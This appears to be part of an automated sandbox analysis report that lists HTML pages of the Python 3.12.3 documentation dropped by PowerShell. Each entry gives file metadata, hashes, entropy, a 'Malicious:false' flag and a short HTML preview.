                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):92534
                              Entropy (8bit):4.9785219756513746
                              Encrypted:false
                              SSDEEP:1536:ltPaMzN1BSovnbrTPlbdrP3EH/vilvYGL6Dc3Hs9ZHmRyv14D3a100TQMa764N:ZN1BSoXTPlR3EH/vilvYGLr3XyvmD3ai
                              MD5:BD187352CC61CA6874343A0CE1D765FE
                              SHA1:0A736658B4ADF21BF5E8F32D90888E90D08CBBD8
                              SHA-256:096DB530CD05E6480B18421E0031FEA478CE81FAD9672EBE25473047C7F9212A
                              SHA-512:B1FF9A41996957545F37BFEA812FF1EEC8CD30EFF59F53922C53BED8602CCCC51385C749399F0FDC6B0B6F647F518EBB31B3FC703E1FDB857302CE3B28FDFEAE
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):44408
                              Entropy (8bit):5.086132005467096
                              Encrypted:false
                              SSDEEP:384:CHtxlVcMPQbIdCR7Qxiks8KywBxFq5FESCmlHlB9ajjnN3zN3550tetZsb3NdepK:WtPaMshEDe/B90OrPcMa764N
                              MD5:0D106E85AF9A7204C66C92391AD9BF59
                              SHA1:745A019069DA520B4FE751F02082BA81ACF194FF
                              SHA-256:8FF164D184A827121CCCC48D2371BF50F1B0E597CA0FA46A6A1844A0E9A06021
                              SHA-512:937E4C4E1862DB52464A69FDB9BF74055AD71DB819F744660F3E7BDD69D0B8C5136882864B647672F46410FB4319160488F6924D63CCCEF1D6A2DF7E131F5493
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):92503
                              Entropy (8bit):4.948964180403251
                              Encrypted:false
                              SSDEEP:1536:/tPaM4BipLfL5aXgoaMaVhWeprrlrM+V+S58mKbQMa764N:kilfLYgoXaVhWeprrlrdgS58mKbdg
                              MD5:FD539BD69F91174FA11C21C6567DE289
                              SHA1:E8619CEE9934BABA7CF187E6C5C32BDA6D88D681
                              SHA-256:8FD78202CF123C9318DF3B2DF70BA03DEAE66CF44DDC036A54D2055566882CA1
                              SHA-512:6B572C4C0F5FC5DE6F0A8CE19A1C53371F9E77EF4B94E6E71F8FBB14DB19BAD40C828A7769F74EB2030B3F8B1FA6A614052F15A1780FC5AAC8D50D58121D17FE
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):14858
                              Entropy (8bit):4.9478128066575335
                              Encrypted:false
                              SSDEEP:384:kHtxlVcMlg7fiArATTxvJp8j9ouRTkOE6pqrnUbgsgiiJfCYCIhyEMEoL5AV5w90:otPaMdPxMa764N
                              MD5:F8C9CC444657AC8EFAAC0D0E711B14FF
                              SHA1:00983D1BD2E02ECA8E6250DDF8E75E23AE48BF75
                              SHA-256:3BE0551C171A2787E05D5EDB7A074CB33AE5FB57775297588954297AD8ABD6AC
                              SHA-512:E7D4AC53DAB8F7C37D77BB38BEF1F8ACBBC06FFA70EFAEBA423A48B6893F8EF0641B978FD03760766653E744E818C06436DEED4A8A6679F272EA4EBFAE4832E9
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):26876
                              Entropy (8bit):5.161030805450256
                              Encrypted:false
                              SSDEEP:384:xHtxlVcMWDXJo/jjAg6YExrUe0iA0wcCeQ2wkbVMEUUlLUnSobHg0WB2g6ZxAtkE:BtPaMadR8xrgNggo692g3Ix6JMa764N
                              MD5:6A422A083868B200046B5D5037F253A5
                              SHA1:5FF221253171656683B5F44D1873FA779E18A675
                              SHA-256:5EE43602FEFAA90FD9AD1FF888207CC877C5D9FCD98B53247AFE2B2EC80E110D
                              SHA-512:15AA7F09B89814A664AA2F59557760F7FF42122A12DA262DD00FE9F8552304ABE1AB181657A73B6632C0D6342B07358C47DD721FB2340DD23FEFCCED949B3BE6
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (604), with CRLF line terminators
                              Category:dropped
                              Size (bytes):51793
                              Entropy (8bit):5.054280029744108
                              Encrypted:false
                              SSDEEP:384:+HtxlVcM0vfpuaC4hGFX7r3nEkq6InCfbflI3IenQpFUAjK6P1WTKmtTq/4u5wqF:StPaM84KLLpTttLdpOi6RHfBMa764N
                              MD5:0AD73FA70402B41D81FE4ABB237FC821
                              SHA1:14F031F4B6D1DC6814A11BFC2DB3DF32E9EB98EB
                              SHA-256:3444135FD37C95FF3C2A423305FF26A3065B75C5A05F37D01D6FB65ABC51B89B
                              SHA-512:525A4535C12071F077A360279277FC015A2842F0BB000D48F13407DF21F26C3EB131DB7A158A83B439D7BBA060803103B2E8F4313C872F9AA8D5F288D1A62CE5
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (523), with CRLF line terminators
                              Category:dropped
                              Size (bytes):96550
                              Entropy (8bit):5.0116874718263045
                              Encrypted:false
                              SSDEEP:1536:btPaMsq/5quAVm4rP75fk9FL1PRv0qUbcnxuNO0VbMa764N:Uq/5quAc4P5fk9FL1PRvzUbcxuNO0VCg
                              MD5:7E84F45BAB2C45D0F888920D899DD6C5
                              SHA1:C71C23740F99A64F5C11671FB5B2EE84ED6A9CCE
                              SHA-256:B56C13ADDDC7827F31CB2CCED12FFC220D313BDB1416A0EC7C73BB8B89E7072D
                              SHA-512:1638223515C4C709225F570D1064A307C3DCDDBAB1DA18233ACD3466C7EE66D96311BF9BCEA97B1BDA4806BBDE7A9349614A6BF2E80043BDB5AEBEFA5E4A65BD
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (412), with CRLF line terminators
                              Category:dropped
                              Size (bytes):43553
                              Entropy (8bit):5.007670927441984
                              Encrypted:false
                              SSDEEP:384:wHtxlVcMwtU3K+uNdqIqGAf3gLa++ff7tTnr0kiPGT5pQSAFwH9ZhL6Wvb5e+csj:ktPaMjmu8I0th9736fp+YlfRQcMa764N
                              MD5:B22CD9B991FC3B3F935DF7FFF22B1855
                              SHA1:A3E518C677DEFA17FF2A8D7D3453716580FA85E3
                              SHA-256:8857447239379742D600DE435EECA55D2B03083E7084DD72E01AB94907CE514A
                              SHA-512:F5D21BAF269CFDF4B1F1B8FABC2130360E15057302F1E1F11C4C68814E83DF246F880D3F2616C2E14CFA30AF6C59CD619F31F86C97F50FFE81E5E8BD2231AD0A
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (496), with CRLF line terminators
                              Category:dropped
                              Size (bytes):49979
                              Entropy (8bit):5.097731558989144
                              Encrypted:false
                              SSDEEP:384:NHtxlVcMWTDTjTNTNTjTRTVT1TTTzT0uTLTJTTTTTvTTTrT7TnTrT9RTRTnT/Td0:9tPaMzkYrRYIkbrRETVVMa764N
                              MD5:6DE7AF214248E9A32AB01FE8CD276E32
                              SHA1:82F32645B6A21B33EF8D1ADC4B9A2562B71DABEC
                              SHA-256:2B07B61E79F4C7078377245B82D88FC9062D64BA55C33A618DEAB68A86060DFC
                              SHA-512:97A897E0C5DCD7CEF16CF1A67E0BBB72767397F18F3FEFD6691F6AF50DC8E446229772B98865D72580D59D28732E1D3860B59BD3660FCA62A1D9DC9A08E9040A
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (2012), with CRLF line terminators
                              Category:dropped
                              Size (bytes):326130
                              Entropy (8bit):5.312932319566024
                              Encrypted:false
                              SSDEEP:1536:OtPaMVK7oOdO3nMkjRtf2S0EY/1uiIifFZEcAvoA3IR0tQ9/0LJ7sMa764N:MK7VdO3nBjRtf2S0EY/AiIiAoA34pOpg
                              MD5:0B08355B9B5014056E4A0187F312121F
                              SHA1:F038A3A8F1B8394598FBA68C9389936B7CBEA700
                              SHA-256:908F818EC8B58DF69303B56EEE98D61AAE86E23C422F70EC7C5C82936AB1F652
                              SHA-512:5C9F2A119B7A6EAF4837554FEAA7AEA20B3E5D83587BB253A5B857192DCB629EA9B7D4B99A36C9ADF8AA88E222BF6C3147A4F899E3669438C9276794628DB026
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15186
                              Entropy (8bit):4.962719177548245
                              Encrypted:false
                              SSDEEP:384:XHtxlVcMe7sf8R+AMWMbDskiNJwdxly0fntTSNAVUraXO5GUuEr99RDvPYePb8Au:3tPaMQrmoCMa764N
                              MD5:523948AEB957D3325C1F525FD0EDF9B4
                              SHA1:62499685BEB5BA34C171BBA91A7FC7DC692E893B
                              SHA-256:3F0A4D1808677C3C67974883274A6D87071BCED522D390E72FBDCE7A8C373EE4
                              SHA-512:D6576D5D053653C38A8C05ADDB1EAED44383D8C06FA8B54CDBEC880D66ED49D0DBE58A6FD88B2B4635B16E350837CE6EA2CBEBA245B645F15A65F981E13025D4
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):114563
                              Entropy (8bit):5.1261880017479475
                              Encrypted:false
                              SSDEEP:1536:AtPaMlUhMJ3Fzjp6ccYg7q4P1ft9s/RSG/OnMa764N:ZhMJ3Fzjp6ccYg7q4P1fLOAG/g
                              MD5:B991D94FF7439D6B8BE1CAABA6E401AB
                              SHA1:C1208D8DCCF71877D345AF2E8F47D9247D28FF2D
                              SHA-256:3EDC7E37AC59400B967CA99AF24E89916135072AB662FBEC5FB246B531F2BBC1
                              SHA-512:A0CBE427F5806525EDBB6AD30A76D3848FA550998CB224DBD22C2D1E549E0CBD461766B0994AEE5B2A960434C21EEF6FCA668573C1A132BB56638F46F7FECB34
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (494), with CRLF line terminators
                              Category:dropped
                              Size (bytes):170009
                              Entropy (8bit):5.064420777617153
                              Encrypted:false
                              SSDEEP:3072:hKlaHgyy5QSrkvD8Zw2FTpFi99e5ANxZ1mqwl5hMEkjt3lsBb3RGg:MlaHgyymSrkcTbiXe5ANvjwl5hMEkjXa
                              MD5:8E10C231529B745B5C52BEAB43E2CEDA
                              SHA1:1FD275DAD9F02F5614E8A5EEA601E680E6A261CB
                              SHA-256:029608137BCE9F55DD4E6CD1ECC82F70CF7AE01F1BA5244C0E1F3E68B49CB604
                              SHA-512:AEAC97F16E3AC839206195D3F84501AB0989DBE86844EA1969E3DA7948349CF6BA759B92CEB86531A61F13F3E58DB44CF1172C52B1C364BAB0271BE03EC1B891
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (485), with CRLF line terminators
                              Category:dropped
                              Size (bytes):76856
                              Entropy (8bit):4.704700073649213
                              Encrypted:false
                              SSDEEP:768:FtPaMTSyKVWgLBU6r0xwFbv7rSmFBknNuRMa764N:FtPaMw33NemjknkRMa764N
                              MD5:A6412C8C11411E1890BE7422315B5AF4
                              SHA1:284070D2E72F3D659C91F4D255C05D62475A0068
                              SHA-256:2911DB24DD19DEDF31B54357F2051AA70114E86D9ADF665698F7F31B2FE7E7BC
                              SHA-512:E63A61BB3571DD1A8C9ECB42319B952B5D470DA3A2E3F3A1C0F3BF14462DE840F4276E9CDF87D7C038C75C2E18A837EB79E6756F80EB7C9844A85CA500FFB54B
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                              Category:dropped
                              Size (bytes):73415
                              Entropy (8bit):4.930979981685583
                              Encrypted:false
                              SSDEEP:1536:KtPaMPEDNjFOdyq23mSb9k8rAiNC8KtXyDZMa764N:IEDNjFOdyq23mSb9k88iNC8KdyDcg
                              MD5:6D5C520382309B27F861EC9BEA3E1AB3
                              SHA1:4521F3818496A73F428978E8E9A0857B6B3B8F8C
                              SHA-256:EA0C88E95B22447717A33343986E9D22AFF0E5417FF8DC58525886E5CD7338B3
                              SHA-512:1058BBC384830755B5206CFD76EA7DFE18097AF8E17792DB97B9DE63A9A1AC298636628513E87D7F49DDB1576BB8466C97866F70A205EC761D1B39B27727BA79
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):44777
                              Entropy (8bit):4.99039103442667
                              Encrypted:false
                              SSDEEP:384:zHtxlVcMHXHjE5OirDBrXhDRgHQjaDlA4T7VP2iOJ7YBr4h1Ny6jVKWTR3VO2CHP:TtPaMe0aimbMu9j/WUU7NN0KMa764N
                              MD5:A46BB05456CFE2B3BAE48A7F4F0B9CEC
                              SHA1:F0AC5E96E2944C5DE62B694CB60167CF65EA2036
                              SHA-256:152D4F0A4F8991BB89918BCC2CA7E9A7F4C53D24CCEB9CB7224B1075A7CD9CDF
                              SHA-512:0A1D48C53D0649961BBCA1BB7D4290641DB70C7AE97A0EEC0A2BF6C02481A724153437F6C427638F41BAA0827EC519AEE727EC825DEB5E4ACC4A18FDBDA414E5
                              Malicious:false
                              Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20953
                              Entropy (8bit):5.027614137328276
                              Encrypted:false
                              SSDEEP:384:IHtxlVcMJt4n+AoBGaZoSypOCT3k01sxxyubmH47AGX15BZaBouLNF10x8C0BCT/:ctPaMPMnTOPMa764N
                              MD5:B73604C61EB2BB454C684D1289DB94DC
                              SHA1:82CFD1A5910E81BA1B0C5691A2C70F6EF6C661B8
                              SHA-256:BFF483F72A6583FF2677BFB98CB9366875D610C1B7AB562F5FF83A3A34F3F680
                              SHA-512:53676CB6A94BA28DACF8D8D309C161925072489B61F9A9F1B269F4A4FB682BA4B2BB5521F3712FF7DFD8BA77FC5751E1899502B7E621086ACA9DFE23B5745E5C
                              Malicious:false
